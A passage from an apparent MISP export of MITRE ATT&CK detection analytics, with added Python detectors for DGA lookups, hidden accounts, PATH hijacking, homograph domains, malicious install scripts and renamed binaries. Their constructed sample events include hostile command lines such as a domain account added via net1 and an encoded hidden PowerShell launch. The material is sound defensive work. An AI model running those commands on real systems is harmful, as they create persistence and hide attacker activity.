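    for r in records:
        if r["rcode"] == "NXDOMAIN" and is_high_entropy(r["qname"]):
            by_proc[(r["host"], r["pid"], " > ".join(r["lineage"]))].append(r)
    findings = []
    for (host, pid, lineage), rs in by_proc.items():
        rs.sort(key=lambda r: r["ts"])
        for i in range(len(rs) - min_failures + 1):
            if rs[i + min_failures - 1]["ts"] - rs[i]["ts"] <= window:
                findings.append({"host": host, "pid": pid, "lineage": lineage, "failures": len(rs),
                                 "first": rs[0]["ts"], "examples": [r["qname"] for r in rs[:3]]})
                break
    return findings


def _t(hms):
    return datetime.fromisoformat(f"2024-05-01T{hms}")


_rng = random.Random(7)
_ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789"


def _dga_name():
    # 16 distinct characters: entropy is exactly 4.0 bits, the shape of a DGA label
    return "".join(_rng.sample(_ALPHABET, 16)) + ".net"


SAMPLE_RECORDS = (
    [{"ts": _t(f"03:0{i}:00"), "host": "web-7", "pid": 4242, "lineage": ["sshd", "bash", "python3"],
      "qname": _dga_name(), "rcode": "NXDOMAIN"} for i in range(8)]
    + [{"ts": _t("03:02:30"), "host": "web-7", "pid": 1337, "lineage": ["systemd", "chrome"],
        "qname": "d3k2jx8q1w9e7r5t.cloudfront.net", "rcode": "NOERROR"}]
    + [{"ts": _t(f"03:1{i}:00"), "host": "web-7", "pid": 900, "lineage": ["systemd", "systemd-resolved"],
        "qname": "wpad.corp.local", "rcode": "NXDOMAIN"} for i in range(2)]
)

if __name__ == "__main__":
    for f in burst_failures(SAMPLE_RECORDS):
        print(f["host"], f["pid"], f["lineage"], f["failures"], f["examples"])
```

On a Linux host the lineage comes from auditd (SYSCALL records for connect/sendto on port 53 carry pid and ppid) or from an eBPF tracer; the resolver log alone only gives the client address.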

Internal MISP references

UUID 00112bcc-174f-4201-ac81-fe3edd1292e6 which can be used as unique global reference for Analytic 0110 - AN0110 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0110
mitre_platforms ['Linux']

Analytic 0101 - AN0101

Non-interactive system processes making encrypted HTTPS connections to well-known web services followed by high outbound traffic volume or scripted upload patterns.

Internal MISP references

UUID 1edab644-3ec0-4c5d-bc26-18744fbc7a6e which can be used as unique global reference for Analytic 0101 - AN0101 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0101
mitre_platforms ['Linux']

Analytic 1001 - AN1001

Registry modifications to HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList setting user visibility to 0, or creation of user accounts not shown on login screen. Defender view: correlation of account creation with registry edits that mark users hidden.
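This analytic and AN0006 above share a join key, the account name in a 4720, so one added example (not MITRE's code) serves both: each 4720 on a host is linked backwards to a process creation (4688) whose command line creates that account, and forwards to a Sysmon registry value-set (Event ID 13) on SpecialAccounts\UserList that sets it to 0. The events are constructed; the domain-controller hostnames are an assumption.

```python
"""Chain process execution, 4720 account creation and the UserList registry write
that hides the new account from the logon screen.  Events are constructed."""
import re
from datetime import datetime, timedelta

DOMAIN_CONTROLLERS = {"DC01", "DC02"}   # assumption: the DCs in this environment
USERLIST = "\\winlogon\\specialaccounts\\userlist\\"
_NET_ADD = re.compile(r"\bnet1?(?:\.exe)?\s+user\s+(?P<name>\S+)(?:\s+\S+)*?\s+/add\b", re.I)
_PS_ADD = re.compile(r"New-(?:AD|Local)User\s+(?:-Name\s+)?[\"']?(?P<name>[^\"'\s]+)", re.I)


def account_from_cmdline(cmdline: str):
    """Account name created by 'net user <name> [pw] /add' or New-ADUser/New-LocalUser."""
    for rx in (_NET_ADD, _PS_ADD):
        m = rx.search(cmdline)
        if m:
            return m.group("name")
    return None


def hidden_user_from_registry(event):
    """Sysmon 13 on ...\\SpecialAccounts\\UserList\\<name> with 'DWORD (0x00000000)' hides <name>."""
    if USERLIST not in event["TargetObject"].lower():
        return None
    m = re.search(r"dword \(0x([0-9a-f]{8})\)", event["Details"].lower())
    if m and int(m.group(1), 16) == 0:
        return event["TargetObject"].rsplit("\\", 1)[-1]
    return None


def correlate(events, window=timedelta(minutes=30)):
    events = sorted(events, key=lambda e: e["ts"])
    findings = []
    for e in events:
        if e["EventID"] != 4720:
            continue
        user, host = e["TargetUserName"].lower(), e["Computer"]
        chain = {"user": e["TargetUserName"], "host": host, "created_by": e["SubjectUserName"], "steps": []}
        for o in events:
            if abs(o["ts"] - e["ts"]) > window or o["Computer"] != host:
                continue
            if o["EventID"] == 4688 and o["ts"] <= e["ts"] and \
                    (account_from_cmdline(o["CommandLine"]) or "").lower() == user:
                chain["steps"].append(f"{o['NewProcessName']} ran: {o['CommandLine']}")
            if o["EventID"] == 13 and o["ts"] >= e["ts"] and \
                    (hidden_user_from_registry(o) or "").lower() == user:
                chain["steps"].append(f"{o['Image']} set {o['TargetObject']} = 0 (hidden from logon screen)")
        if host in DOMAIN_CONTROLLERS and any("ran:" in s for s in chain["steps"]):
            chain["note"] = "domain account created via command line on a domain controller"
        if chain["steps"]:   # a 4720 with neither neighbour is ordinary provisioning
            findings.append(chain)
    return findings


def _t(hms):
    return datetime.fromisoformat(f"2024-05-01T{hms}")


USERLIST_KEY = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList"
SAMPLE_EVENTS = [
    # AN0006 chain: net1 user ... /add /domain on a DC, then 4720 on the same host
    {"ts": _t("02:10:00"), "EventID": 4688, "Computer": "DC01", "SubjectUserName": "svc_sql",
     "NewProcessName": r"C:\Windows\System32\net1.exe", "CommandLine": "net1 user backupadm P@ssw0rd! /add /domain"},
    {"ts": _t("02:10:01"), "EventID": 4720, "Computer": "DC01", "SubjectUserName": "svc_sql", "TargetUserName": "backupadm"},
    # AN1001 chain: local account created, then hidden via UserList = 0
    {"ts": _t("02:13:00"), "EventID": 4688, "Computer": "WS-042", "SubjectUserName": "svc_sql",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -c "New-LocalUser -Name helpdesk -Password $p"'},
    {"ts": _t("02:13:02"), "EventID": 4720, "Computer": "WS-042", "SubjectUserName": "svc_sql", "TargetUserName": "helpdesk"},
    {"ts": _t("02:14:00"), "EventID": 13, "Computer": "WS-042", "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": USERLIST_KEY + r"\helpdesk", "Details": "DWORD (0x00000000)"},
    # ordinary provisioning: 4720 with no suspicious neighbour, not reported
    {"ts": _t("09:00:00"), "EventID": 4720, "Computer": "HR-01", "SubjectUserName": "it-admin", "TargetUserName": "jdoe"},
]

if __name__ == "__main__":
    for c in correlate(SAMPLE_EVENTS):
        print(c)
```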

Internal MISP references

UUID 6039c777-6a85-4df4-86b9-40d95796046e which can be used as unique global reference for Analytic 1001 - AN1001 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1001
mitre_platforms ['Windows']

Analytic 1010 - AN1010

Detect abnormal use of email clients (e.g., Outlook, Thunderbird) showing mass arrival of messages or repetitive attachments being locally stored. Correlate message volume with file creation activity in mail cache directories.

Internal MISP references

UUID 7e9cb99b-4040-4b73-bd70-1bd68ae0f373 which can be used as unique global reference for Analytic 1010 - AN1010 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1010
mitre_platforms ['Office Suite']

Analytic 0011 - AN0011

Modification of PATH or HOME environment variables through shell config files, launchctl, or /etc/paths.d entries, combined with process execution from attacker-controlled directories. Defender correlates file changes in /etc/paths.d with process execution resolving to malicious binaries.
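AN0010, AN0009 and this analytic are one technique across three platforms, so a single added example (not MITRE's code) covers them: a PATH value taken from a shell rc line, a launchctl setenv command or an Environment registry value is reduced to the directories it places ahead of the first system directory, and later executions of a system-tool name from one of those directories are reported. Events are constructed; the baseline directories and tool names are assumptions to extend.

```python
"""Correlate PATH changes that put a user-writable directory ahead of the system
directories with later execution of a system-tool name from that directory.
Shell rc lines and launchctl setenv (Linux/macOS) and the Environment registry
value (Windows) are handled.  Events are constructed for this example."""
import re
from datetime import datetime, timedelta

BASELINE = {
    "posix": {"/bin", "/usr/bin", "/sbin", "/usr/sbin", "/usr/local/bin", "/usr/local/sbin"},
    "windows": {r"c:\windows\system32", r"c:\windows", r"c:\windows\system32\wbem",
                r"c:\windows\system32\windowspowershell\v1.0"},
}
SYSTEM_TOOLS = {"ls", "sudo", "curl", "ssh", "git", "python3", "cat", "ps",
                "cmd.exe", "powershell.exe", "whoami.exe", "net.exe", "ping.exe"}
_ASSIGN = re.compile(r'^\s*(?:export\s+)?PATH=["\']?(?P<value>[^"\']+)')
_LAUNCHCTL = re.compile(r'^\s*launchctl\s+setenv\s+PATH\s+["\']?(?P<value>[^"\']+)')


def path_from_line(line: str):
    """New PATH value from a shell rc line or a launchctl setenv command, else None."""
    for rx in (_ASSIGN, _LAUNCHCTL):
        m = rx.match(line)
        if m:
            return m.group("value")
    return None


def norm_dir(d: str, platform: str, home: str) -> str:
    d = d.strip().rstrip("/\\")
    if platform == "windows":
        return d.replace("%USERPROFILE%", home).lower()
    return d.replace("${HOME}", home).replace("$HOME", home).replace("~", home)


def shadowing_dirs(value: str, platform: str, home="/home/user"):
    """Directories listed before the first baseline directory (or before $PATH):
    these win the lookup for any name that also exists in the system directories."""
    sep = ";" if platform == "windows" else ":"
    base = BASELINE["windows" if platform == "windows" else "posix"]
    out = []
    for d in value.split(sep):
        nd = norm_dir(d, platform, home)
        if nd in base or nd in ("$PATH", "${PATH}", "%path%"):
            break
        out.append(nd)
    return out


def correlate(changes, executions, window=timedelta(days=7)):
    findings = []
    for c in changes:
        dirs = set(shadowing_dirs(c["value"], c["platform"], c["home"]))
        if not dirs:
            continue
        win = c["platform"] == "windows"
        for e in executions:
            if e["host"] != c["host"] or not (c["ts"] <= e["ts"] <= c["ts"] + window):
                continue
            exe = e["image"].lower() if win else e["image"]
            d, _, name = exe.rpartition("\\" if win else "/")
            if d in dirs and name in SYSTEM_TOOLS:
                findings.append({"host": c["host"], "source": c["source"], "dir": d,
                                 "binary": name, "cmdline": e["cmdline"]})
    return findings


def _t(s):
    return datetime.fromisoformat(s)


SAMPLE_CHANGES = [
    {"ts": _t("2024-05-01T09:00:00"), "host": "dev-lnx1", "platform": "linux", "home": "/home/bob",
     "source": "/home/bob/.bashrc", "value": path_from_line('export PATH="$HOME/.local/share/.bin:$PATH"')},
    {"ts": _t("2024-05-01T09:05:00"), "host": "mac-7", "platform": "macos", "home": "/Users/alice",
     "source": "launchctl", "value": path_from_line(
         "launchctl setenv PATH /Users/alice/Library/Caches/.p:/usr/bin:/bin:/usr/sbin:/sbin")},
    {"ts": _t("2024-05-01T09:10:00"), "host": "win-3", "platform": "windows", "home": r"c:\users\carol",
     "source": r"HKU\S-1-5-21-1-2-3-1001\Environment\Path",
     "value": r"%USERPROFILE%\AppData\Local\Temp\bin;C:\Windows\system32;C:\Windows"},
    # benign: appending a tools directory after the system directories shadows nothing
    {"ts": _t("2024-05-01T09:20:00"), "host": "dev-lnx1", "platform": "linux", "home": "/home/bob",
     "source": "/home/bob/.profile", "value": path_from_line("PATH=$PATH:$HOME/go/bin")},
]
SAMPLE_EXECS = [
    {"ts": _t("2024-05-01T09:30:00"), "host": "dev-lnx1", "image": "/home/bob/.local/share/.bin/sudo", "cmdline": "sudo apt update"},
    {"ts": _t("2024-05-01T09:31:00"), "host": "dev-lnx1", "image": "/usr/bin/ls", "cmdline": "ls -la"},
    {"ts": _t("2024-05-01T09:40:00"), "host": "mac-7", "image": "/Users/alice/Library/Caches/.p/curl", "cmdline": "curl https://example.org"},
    {"ts": _t("2024-05-01T09:45:00"), "host": "win-3", "image": r"C:\Users\carol\AppData\Local\Temp\bin\whoami.exe", "cmdline": "whoami /all"},
    {"ts": _t("2024-05-01T10:00:00"), "host": "dev-lnx1", "image": "/home/bob/go/bin/gopls", "cmdline": "gopls"},
]

if __name__ == "__main__":
    for f in correlate(SAMPLE_CHANGES, SAMPLE_EXECS):
        print(f)
```

On macOS, path_helper builds PATH from /etc/paths followed by the files in /etc/paths.d, so a new /etc/paths.d entry lands after the system directories and only wins for names they do not already provide; an edit to /etc/paths itself is what reorders them. Feed the PATH that results from either change into shadowing_dirs in the same way.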

Internal MISP references

UUID b2261c7f-664b-400c-b8ba-8b5bc3bac75a which can be used as unique global reference for Analytic 0011 - AN0011 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0011
mitre_platforms ['macOS']

Analytic 1100 - AN1100

Adversary spawns a process or script to enumerate installed software using WMI, registry, or PowerShell, potentially followed by additional discovery or evasion behavior.

Internal MISP references

UUID c0bbe0a5-680f-487b-8f5f-27703efb52b7 which can be used as unique global reference for Analytic 1100 - AN1100 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1100
mitre_platforms ['Windows']

Analytic 1020 - AN1020

Suspicious processes (e.g., Tor clients, relays, unknown binaries) launch with sustained encrypted outbound traffic to known anonymity infrastructure (e.g., Tor, I2P), and may relay to additional internal systems via reverse proxying, ICMP tunneling, or socket forwarding.

Internal MISP references

UUID 128315ea-6407-4c28-8528-209e799ad8e1 which can be used as unique global reference for Analytic 1020 - AN1020 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1020
mitre_platforms ['Windows']

Analytic 1200 - AN1200

Monitors Keychain database access and suspicious invocations of security and osascript utilities. Correlates process execution with attempts to dump or unlock Keychain data.

Internal MISP references

UUID 2bec56a7-957c-44b4-b730-00dd55ff99f8 which can be used as unique global reference for Analytic 1200 - AN1200 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1200
mitre_platforms ['macOS']

Analytic 1002 - AN1002

Use of gsettings or direct Display Manager modifications to hide users from greeter login screen. Defender view: anomalous command execution modifying org.gnome.login-screen or other greeter configurations.

Internal MISP references

UUID 397a553d-c08d-497e-8fb0-9526f5a205bc which can be used as unique global reference for Analytic 1002 - AN1002 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1002
mitre_platforms ['Linux']

Analytic 0102 - AN0102

Scripting engines (e.g., osascript, Python) initiating HTTPS requests to social media or content-sharing platforms, paired with automated response handling indicative of two-way communication.

Internal MISP references

UUID 5935bda3-8d4d-44b4-aca4-8b40cf45f686 which can be used as unique global reference for Analytic 0102 - AN0102 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0102
mitre_platforms ['macOS']

Analytic 0210 - AN0210

Detects embedded or emulated VBScript/VBA execution via Wine-based apps, Office for Mac abusing cross-platform .NET features, or macros dropped and invoked via AppleScript or third-party automation tools.

Internal MISP references

UUID 668bc76f-04cc-4274-8a66-cfa00e83ef14 which can be used as unique global reference for Analytic 0210 - AN0210 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0210
mitre_platforms ['macOS']

Analytic 0201 - AN0201

Anomalous access to cloud web applications using session tokens without corresponding MFA/credential validation, often from unusual locations or device fingerprints.

Internal MISP references

UUID 8d43ac43-de80-4815-b992-6f49519ed340 which can be used as unique global reference for Analytic 0201 - AN0201 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0201
mitre_platforms ['IaaS']

Analytic 2010 - AN2010

Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing) Monitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links and identifying obfuscated URLs) can also help detect links leading to known malicious sites.(Citation: Mandiant URL Obfuscation 2023)

Furthermore, monitor browser logs for homographs in ASCII and in internationalized domain names abusing different character sets (e.g., Cyrillic vs. Latin versions of trusted sites). Monitor network data for uncommon data flows: processes that use the network but do not normally have network communication, or have never been seen before, are suspicious. Analyze traffic patterns and perform packet inspection on the protocol(s) in use, leveraging SSL/TLS inspection for encrypted traffic, to find traffic that does not follow the expected protocol standards and flows (e.g., extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax or structure). Consider correlation with process monitoring and command-line logging to detect anomalous process execution and arguments associated with those traffic patterns (e.g., anomalies in the use of files that do not normally initiate connections for the respective protocol(s)).

Also monitor and analyze traffic patterns and packet contents for indicators of cloned websites. For example, if adversaries use HTTrack to clone websites, the string "Mirrored from (victim URL)" may be visible in the HTML section of packets.
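The homograph check the two paragraphs above call for, as an added example (not MITRE's code): punycode labels are decoded with the standard-library IDNA codec, labels mixing Unicode scripts are reported, and a small confusables table (a hand-picked subset, not the full Unicode confusables data) reduces each registrable label to a Latin skeleton that is compared with a trusted-domain list. The trusted list and sample hosts are constructed; the punycode forms are generated from their Unicode strings so the check round-trips.

```python
"""Flag IDN and ASCII homographs of trusted domains.  The trusted list, the
confusables subset and the sample hosts are constructed for this example."""
import unicodedata

TRUSTED = {"apple.com", "microsoft.com", "paypal.com", "cisco.com", "example.com"}

# Confusable characters mapped to the Latin letter they imitate (small subset of
# the Unicode confusables table, chosen for this example).
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c", "\u0445": "x",
    "\u0443": "y", "\u0456": "i", "\u0458": "j", "\u0455": "s", "\u04bb": "h",
    "\u0261": "g", "\u03bf": "o", "\u03b1": "a",
    "0": "o", "1": "l", "|": "l",
}
ASCII_PAIRS = {"rn": "m", "vv": "w"}   # two-letter sequences that read as one letter


def decode_idn(host: str) -> str:
    """xn-- labels to Unicode via the stdlib IDNA codec; other hosts pass through."""
    try:
        return host.encode("ascii").decode("idna")
    except UnicodeError:
        return host


def scripts(label: str):
    """Unicode script prefixes ('LATIN', 'CYRILLIC', ...) of the letters in a label."""
    return {unicodedata.name(ch, "UNKNOWN").split(" ")[0] for ch in label if ch.isalpha()}


def skeleton(label: str) -> str:
    s = "".join(CONFUSABLES.get(ch, ch) for ch in label.lower())
    for pair, single in ASCII_PAIRS.items():
        s = s.replace(pair, single)
    return s


def check_host(host: str):
    """Reasons the host looks like a homograph of a trusted domain (empty = clean)."""
    host = decode_idn(host.lower().rstrip("."))
    if host in TRUSTED:
        return []
    labels = host.split(".")
    reasons = []
    for label in labels[:-1]:
        sc = scripts(label)
        if len(sc) > 1:
            reasons.append(f"mixed scripts {sorted(sc)} in label '{label}'")
    regdom = ".".join(labels[-2:])
    sk = skeleton(labels[-2]) + "." + labels[-1]
    if regdom not in TRUSTED and sk in TRUSTED:
        reasons.append(f"'{regdom}' is a lookalike of '{sk}'")
    return reasons


def scan_hosts(hosts):
    return {h: check_host(h) for h in hosts if check_host(h)}


def _puny(unicode_host: str) -> str:
    return unicode_host.encode("idna").decode("ascii")


SAMPLE_HOSTS = [
    _puny("\u0430pple.com"),                          # Cyrillic 'а' + Latin: mixed script and skeleton hit
    _puny("\u0441\u0456\u0455\u0441\u043e.com"),      # all-Cyrillic 'cisco': only the skeleton catches it
    "rnicrosoft.com",                                 # ASCII homograph
    "paypa1.com",
    "microsoft.com",
    "docs.example.com",
    "www.github.com",
]

if __name__ == "__main__":
    for host, reasons in scan_hosts(SAMPLE_HOSTS).items():
        print(host, "->", "; ".join(reasons))
```

A production version should use the full confusables data and a public-suffix list for the registrable-domain split; the skeleton approach itself is what the Unicode security mechanisms (UTS #39) describe.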

Internal MISP references

UUID 985e0098-b77c-4099-a262-5f195b654187 which can be used as unique global reference for Analytic 2010 - AN2010 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2010
mitre_platforms ['PRE']

Analytic 0021 - AN0021

Adversary manipulates dependencies/dev tools used by developers or CI: a package manager (npm/yarn/pnpm, pip/pipenv, nuget/dotnet, chocolatey/winget, maven/gradle) or a compiler/IDE downloads or restores content; files are written under project paths and execution paths (node_modules, packages, .nuget, .gradle, .m2, %AppData%\npm, %UserProfile%\.cargo\bin, temp build dirs). First run of newly written components triggers scripts (preinstall/postinstall), shell/PowerShell spawning, or loader DLLs, followed by network egress to non-approved registries/CDNs.
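The behaviour chain above, rebuilt as an added example over constructed process and connection records (not MITRE's code): the process tree is reconstructed from pid/ppid, a shell whose working directory sits in a dependency directory and whose ancestors include a package manager is treated as an install-time script, and any egress from it or its descendants to a host outside an approved-registry list is reported. The approved hosts, dependency markers and sample processes are assumptions for the example.

```python
"""Detect a package-manager install that spawns a shell from a dependency directory
and then reaches a host outside the approved registries.  Events are constructed."""

PACKAGE_MANAGERS = {"npm", "npm.cmd", "npx", "yarn", "pnpm", "pip", "pip3", "pipenv", "poetry",
                    "dotnet", "nuget", "msbuild", "mvn", "gradle", "cargo", "choco", "winget"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "sh", "bash", "zsh"}
DEP_MARKERS = ("node_modules", "site-packages", ".nuget", ".gradle", ".m2", ".cargo")
APPROVED_HOSTS = {"registry.npmjs.org", "registry.yarnpkg.com", "pypi.org", "files.pythonhosted.org",
                  "api.nuget.org", "repo.maven.apache.org", "crates.io", "static.crates.io", "github.com"}


def basename(image: str) -> str:
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()


def ancestors(tree, pid):
    """The process itself, then its parent, grandparent, ... (stops at unknown pids)."""
    out, seen = [], set()
    while pid in tree and pid not in seen:
        seen.add(pid)
        out.append(tree[pid])
        pid = tree[pid]["ppid"]
    return out


def descendants(tree, pid):
    out, stack = [], [pid]
    while stack:
        cur = stack.pop()
        for p in tree.values():
            if p["ppid"] == cur:
                out.append(p)
                stack.append(p["pid"])
    return out


def find_install_script_chains(procs, connections):
    tree = {p["pid"]: p for p in procs}
    conns = {}
    for c in connections:
        conns.setdefault(c["pid"], []).append(c["dst_host"].lower())
    findings = []
    for p in procs:
        if basename(p["image"]) not in SCRIPT_HOSTS:
            continue
        chain = ancestors(tree, p["pid"])
        pm = next((a for a in chain[1:] if basename(a["image"]) in PACKAGE_MANAGERS), None)
        if pm is None:
            continue
        # report only the outermost script host of a chain, not every nested shell
        if any(basename(a["image"]) in SCRIPT_HOSTS for a in chain[1:chain.index(pm)]):
            continue
        cwd = p.get("cwd", "").replace("\\", "/").lower() + "/"
        if not any(f"/{m}/" in cwd for m in DEP_MARKERS):
            continue
        egress = sorted({h for d in [p] + descendants(tree, p["pid"])
                         for h in conns.get(d["pid"], []) if h not in APPROVED_HOSTS})
        findings.append({"package_manager": pm["cmdline"], "script_host": p["cmdline"], "cwd": p["cwd"],
                         "lineage": " > ".join(basename(a["image"]) for a in reversed(chain)),
                         "unapproved_egress": egress, "severity": "high" if egress else "low"})
    return findings


SAMPLE_PROCS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Program Files\nodejs\npm.cmd", "cmdline": "npm install", "cwd": r"C:\src\webapp"},
    {"pid": 101, "ppid": 100, "image": r"C:\Program Files\nodejs\node.exe", "cmdline": "node npm-cli.js install", "cwd": r"C:\src\webapp"},
    {"pid": 102, "ppid": 101, "image": r"C:\Windows\System32\cmd.exe", "cmdline": 'cmd.exe /d /s /c "node setup.js"',
     "cwd": r"C:\src\webapp\node_modules\colorz-utils"},
    {"pid": 103, "ppid": 102, "image": r"C:\Program Files\nodejs\node.exe", "cmdline": "node setup.js",
     "cwd": r"C:\src\webapp\node_modules\colorz-utils"},
    {"pid": 104, "ppid": 103, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden -enc SQBFAFgA", "cwd": r"C:\src\webapp\node_modules\colorz-utils"},
    # benign: a native-addon build spawns a shell from node_modules but only talks to approved hosts
    {"pid": 200, "ppid": 1, "image": r"C:\Program Files\nodejs\npm.cmd", "cmdline": "npm install", "cwd": r"C:\src\api"},
    {"pid": 201, "ppid": 200, "image": r"C:\Program Files\nodejs\node.exe", "cmdline": "node npm-cli.js install", "cwd": r"C:\src\api"},
    {"pid": 202, "ppid": 201, "image": r"C:\Windows\System32\cmd.exe", "cmdline": 'cmd.exe /d /s /c "node-gyp rebuild"',
     "cwd": r"C:\src\api\node_modules\bcrypt"},
    # a developer's interactive shell: no package-manager ancestor
    {"pid": 300, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe", "cwd": r"C:\Users\dev"},
    {"pid": 301, "ppid": 300, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe", "cwd": r"C:\src\webapp\node_modules"},
]
SAMPLE_CONNS = [
    {"pid": 101, "dst_host": "registry.npmjs.org"},
    {"pid": 104, "dst_host": "cdn-assets.example.net"},
    {"pid": 202, "dst_host": "github.com"},
]

if __name__ == "__main__":
    for f in find_install_script_chains(SAMPLE_PROCS, SAMPLE_CONNS):
        print(f["severity"], f["lineage"], f["cwd"], f["unapproved_egress"])
```

Native-addon builds (node-gyp, cargo build scripts, setup.py with C extensions) legitimately spawn shells from dependency directories, which is why the example scores on egress rather than on the spawn alone; `npm install --ignore-scripts` and a registry proxy that is the only allowed egress remove most of the residual noise.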

Internal MISP references

UUID 9ec9d296-173f-4e47-8bc4-d20d558e6e18 which can be used as unique global reference for Analytic 0021 - AN0021 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0021
mitre_platforms ['Windows']

Analytic 2001 - AN2001

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID ca1afe09-7edb-4415-a240-92a0f30ac22f which can be used as unique global reference for Analytic 2001 - AN2001 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2001
mitre_platforms ['PRE']

Analytic 0120 - AN0120

Detection of commands accessing locale, timezone, or language settings such as 'locale', 'timedatectl', or parsing /etc/timezone. Anomalous execution by unusual users or automation scripts should be flagged.

Internal MISP references

UUID d053d033-b587-4ed0-bdbc-0c6a9bdd7c82 which can be used as unique global reference for Analytic 0120 - AN0120 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0120
mitre_platforms ['Linux']

Analytic 0012 - AN0012

Execution of binaries where the on-disk filename does not match PE metadata such as OriginalFilename or InternalName. Often observed with renamed LOLBAS or system binaries like rundll32, powershell, or psexec.
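An added example of this check over constructed Sysmon Event ID 1 records (not MITRE's code): the file-name stem of Image is compared with the stem of OriginalFileName, a short list of OriginalFileName values that adversaries habitually rename raises the severity, and the cases Sysmon cannot read ("-" or "?") are kept separate from real mismatches. The allowlist and the sensitive-name list are assumptions to extend.

```python
"""Compare the on-disk name of an executed image with the OriginalFileName that
Sysmon (Event ID 1) reads from the PE version resource.  Records are constructed."""
import ntpath

# OriginalFileName values (lower-cased) of binaries adversaries commonly rename.
RENAME_SENSITIVE = {"rundll32.exe", "powershell.exe", "pwsh.dll", "mshta.exe", "regsvr32.exe",
                    "certutil.exe", "wscript.exe", "cscript.exe", "cmd.exe", "msiexec.exe",
                    "psexec.c", "psexesvc.exe", "bitsadmin.exe", "msbuild.exe", "installutil.exe"}
# (image name, OriginalFileName) pairs that never matched for the legitimate binary.
# Stems are compared, so psexec.exe/psexec.c and pwsh.exe/pwsh.dll already pass.
KNOWN_MISMATCHES = {("psexec64.exe", "psexec.c")}


def _stem(name: str) -> str:
    return ntpath.splitext(name.lower())[0]


def evaluate(record):
    """Return (verdict, detail); verdict is one of
    ok | unknown | allowlisted | renamed | renamed-lolbin."""
    image_name = ntpath.basename(record["Image"]).lower()
    original = record.get("OriginalFileName", "-").strip().lower()
    if original in ("", "-", "?"):
        return "unknown", "no version resource, or Sysmon could not read it"
    if _stem(image_name) == _stem(original):
        return "ok", ""
    if (image_name, original) in KNOWN_MISMATCHES:
        return "allowlisted", f"{image_name} always reports {original}"
    if original in RENAME_SENSITIVE:
        return "renamed-lolbin", f"{image_name} is really {original}"
    return "renamed", f"{image_name} reports OriginalFileName {original}"


def scan(records):
    """(Image, verdict, detail) for every record that is a real mismatch."""
    out = []
    for r in records:
        verdict, detail = evaluate(r)
        if verdict in ("renamed", "renamed-lolbin"):
            out.append((r["Image"], verdict, detail))
    return out


SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\rundll32.exe", "OriginalFileName": "RUNDLL32.EXE"},
    {"Image": r"C:\Users\bob\AppData\Local\Temp\svchost.exe", "OriginalFileName": "PowerShell.EXE"},
    {"Image": r"C:\Tools\ps.exe", "OriginalFileName": "psexec.c"},
    {"Image": r"C:\ProgramData\update.exe", "OriginalFileName": "installer.exe"},
    {"Image": r"C:\Program Files\Vendor\app.exe", "OriginalFileName": "-"},
    {"Image": r"C:\Tools\PsExec64.exe", "OriginalFileName": "psexec.c"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "OriginalFileName": "PowerShell.EXE"},
]

if __name__ == "__main__":
    for image, verdict, detail in scan(SAMPLE_EVENTS):
        print(verdict, image, "-", detail)
```

OriginalFileName is read from a resource the adversary can edit, so this catches the plain rename, not a rebuilt binary; pair it with the Hashes field (a known hash under an unexpected name) and with signature status for the same event.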

Internal MISP references

UUID ec036273-4e90-465e-b115-a69bbb68dde4 which can be used as unique global reference for Analytic 0012 - AN0012 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0012
mitre_platforms ['Windows']

Analytic 0103 - AN0103

Adversary registers new devices to compromised user accounts to bypass MFA or conditional access policies via Microsoft Entra ID (formerly Azure AD), Okta, or Duo self-enrollment portals.

Internal MISP references

UUID 108a10d2-4a9e-4c11-8a6f-42c8b60f0f52 which can be used as unique global reference for Analytic 0103 - AN0103 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0103
mitre_platforms ['Identity Provider']

